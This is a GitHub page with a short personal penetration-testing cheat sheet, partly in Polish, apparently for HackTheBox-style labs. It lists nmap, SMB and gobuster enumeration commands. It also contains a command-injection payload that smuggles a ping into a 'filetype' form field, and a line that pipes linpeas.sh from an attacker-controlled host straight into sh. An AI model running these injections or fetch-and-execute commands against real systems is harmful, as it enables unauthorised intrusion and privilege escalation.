-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathalgorytm
26 lines (19 loc) · 1.03 KB
/
algorytm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
nmap -A 192.168.191.144 -p 1-65535 -T5
sudo nmap -sU 192.168.248.145
nmap -sV --script vuln 192.168.191.144 -p 80
ls /usr/share/nmap/scripts | grep smb
smbclient -L solarlab.htb -N -> skan smb
vuln scaner (templates warto sprawdzic)
https://github.com/projectdiscovery
echo "version" | nc 192.168.238.143 3003
gobuster dir -u http://192.168.248.145 -w /usr/share/wordlists/dirb/big.txt
gobuster dns -d devvortex.htb -w /usr/share/wordlists/subdomains-top1million.txt -t 20
gobuster vhost --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://devvortex.htb
gobuster dir -u http://192.168.248.145 -w /usr/share/wordlists/dirb/big.txt -x .php, .txt
sprawdzaj lokalizacje cgi-bin
gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/big.txt -x sh, cgi, pl
sudo tcpdump -ni tun0 icmp
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;ping+10.10.14.5&dimensions=30x20
https://www.exploit-db.com
python3 -m http.server 80
curl -L http://10.10.14.252/linpeas.sh | sh